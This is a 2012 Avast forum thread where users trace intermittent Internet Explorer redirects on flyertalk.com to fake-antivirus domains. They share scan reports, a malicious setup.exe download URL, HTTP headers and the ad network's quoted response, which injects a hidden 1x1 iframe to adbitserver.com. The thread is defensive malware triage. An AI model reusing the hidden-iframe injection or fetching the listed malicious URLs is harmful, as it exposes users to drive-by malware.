Avast WEBforum
Other => Viruses and worms => Topic started by: AndyH on July 31, 2012, 02:45:21 PM
-
Hi
I am getting constant redirects from hxxp://www.flyertalk.com/forum (only this site)
The redirects are to Polish domains (changing each day - http://support.clean-mx.de/clean-mx/viruses.php?ip=31.210.109.37&sort=first%20desc) with a Turkish IP address (constantly - 31.210.109.37) - the latest http://urlquery.net/report.php?id=108921
Other forum users are getting the same redirect, however it is only happening IE (Firefox/Chrome seem unaffected).
I have scanned the forum with Sucuri SiteCheck/Virus Total/Zscaler, but it is coming up clean each time.
Any thoughts why the redirect is happening?
Thanks
-
Also to add:
This is not happening everytime. It is infrequent (say 1 in 10 times).
-
Hi AndyH,
Does the redirect happen immediately or on page-load?
-
Hi AndyH,
Does the redirect happen immediately or on page-load?
Hi
It happens immediately, before the page has time to load.
It happens when you access the site from any way (manually inputting the address/Google search/clicking on a favourite/history).
-
Look at the code here, suspicious?
polonus
-
Hi Polonus,
Given here as a tracking cookie:
hXtp://www.flyertalk.com/forum/technical-issues/991476-waiting-pxl-ibpxl-com.html
@AndyH,
I am unable to replicate the problem.
http://urlquery.net/report.php?id=108970
http://urlquery.net/report.php?id=108993
Or Here:
http://www.unmaskparasites.com/security-report/?page=http%3A//www.flyertalk.com/forum/index.php
Or the return I get with IE:
https://www.virustotal.com/file/7835952352613aea6c69a8768a7567bbd13e16988f93783083419bff7a8c5f31/analysis/1343740830/
Always returns around 85-90,000 bytes.
Nothing Here:
http://zulu.zscaler.com/submission/show/71d7b2d74d2432f132c395aed8f8523d-1343740996
-
Thanks
Yes, none of the usual sites can find where the redirect is coming from as it's not occuring everytime.
Other forums have also experienced the same redirect over the past few days to the same Turkish IP address - hxxp://www.quartertothree.com/game-talk/showthread.php?p=3182083
I guess it is a matter of trying to figure out what both sites have in common?
-
This time (using firefox), I get a somewhat different return. A popUp() function, however, using the general search, no reference to it.
To raise more suspicion, it uses eval to generate it. This could be the cause of redirect.
-
Hi AndyH and !Donovan,
Somehow the issue is related to an outdated os commerce installation (IP 31.210.109.37 has many domains, where this malware has now being closed).
See sitevet report for that AS: AS Name: RADORE Radore Hosting Telekomunikasyon Hizmetleri San. ve Tic. Ltd. Sti.
IPs allocated: 94464
Blacklisted URLs: 177
Hosts...
...malicious URLs? Yes
...badware? Yes
...Zeus botnet servers? Yes
...Current Events? Yes
Another related site: http://urlquery.net/report.php?id=107502
What is taking place there is a Fake AV attack via performancetesterfail-safety dot pl
This info was mentioned in Norton Safe Web comments, but later removed, but I found it via the Google cache data,
yes my good friends, sometimes Google is your best friend, like in this case, keeping this info for polonus online,
so WordPress users and users of outdated oscommerce software are under attack,
polonus
-
@!Donovan and @polonus
Thanks - I think we are getting there...
The same infected IP is picked up here - http://urlquery.net/report.php?id=106836
However, I am not so sure what it means exactly.
-
Hi AndyH,
This is being returned from there: hxtp://ispsystem.com/sites/all/modules/views/js/jquery.ui.dialog.patch.js?m80f8m
File size:1134 bytes File MD5:48e77be7c0c6ba44bdef8f3adc2774bb (a patch for jQuery) but that code is benign
Now the malware being served up from that site:
First there is a malcious request: /yd45hn/al/7deeae50b6b00140/0/download/ HTTP/1.1
Host: pctestersaver dot pl
And the response results in what I mentioned earlier: htxp://pctestersaver.pl/yd45hn/al/7deeae50b6b00140/0/release/new/setup.exe
And bingo 100/100% malicious, see: http://zulu.zscaler.com/submission/show/11168afb1422684c37990b09d8757c21-1343746829
Also detected here: http://www.avgthreatlabs.com/sitereports/domain/pctestersaver.pl
During the last 7 days potentially active threats were detected on the main site of this domain
Site blacklisted in multiple real-time domain blocklists, malware last detected 2012-07-28, site infected also this domain: monarchmoving dot com,
12 trojans found there, see: http://www.google.com/safebrowsing/diagnostic?site=monarchmoving.com/
infected through: http://www.google.com/safebrowsing/diagnostic?site=wojianfei.net/ and some 202 other sites were infested with this malcode....
This one was from 2 days ago: http://urlquery.net/report.php?id=106836
polonus
-
Hi again polonus/!Donovan
Ok, I have tested the site with HTTP Analyzer and avast! disabled to get the full picture when the redirect happens.
As you can see, the redirect is coming from hxxp://adbitserver.com - question is though, where is that in the original forum?
Here is a pic of the HTTP Analyzer http://img24.imageshack.us/img24/3795/httpanalyzer.png - ignore the live.com, that is my hotmail account. Your uploads weren't working as I kept getting a 500 error.
-
Hi AndyH,
As you can see, the redirect is coming from hxxp://adbitserver.com - question is though, where is that in the original forum?
If you would, please navigate to the Header tab and post the contents of the Referer information in your next post.
-
Hi AndyH,
As you can see, the redirect is coming from hxxp://adbitserver.com - question is though, where is that in the original forum?
If you would, please navigate to the Header tab and post the contents of the Referer information in your next post.
(Request-Line):GET /in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX HTTP/1.1
Accept:text/html, application/xhtml+xml, */*
Referer:hxxp://www.flyertalk.com/forum/
Accept-Language:en-GB
User-Agent:Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding:gzip, deflate
Host:adbitserver.com
Connection:Keep-Alive
-
I've also attached a copy of the original source code for the site - interestingly the site loaded on my screen a fraction of a sec before the redirect.
-
Looking further at the HHTP Analysis, the redirect originates from #3 in the list (adliclick.com):
This is the content response:
document.write('<a href="hxxp://hoteldetect.net" target="_blank"><img src="hxxp://adliclick.com/banners/12175/475737972919972/1.jpg" alt="" style="border:none" /></a>');document.write('<iframe src="hxxp://adbitserver.com/in?q=LfCAhlbgw9cnPT8tAbM5uSk36uh4OyeQxol9XkHX" frameborder="0" marginheight="0" marginwidth="0" scrolling="no" width="1" height="1"></iframe>');
-
Hi AndyH,
This is a PHISH for yahoo as you can see from the external element in this scan: http://zulu.zscaler.com/submission/show/f552c70b095960fbb46e7f029360a2be-1343831094
100/100% malicious! I get
Content after the < /html> tag should be considered suspicious.
38: < !-- w234.fp.bf1.yahoo dot com uncompressed/chunked Wed Aug 1 07:37:16 PDT 2012 -->
See IDS alert here: http://urlquery.net/report.php?id=110442
polonus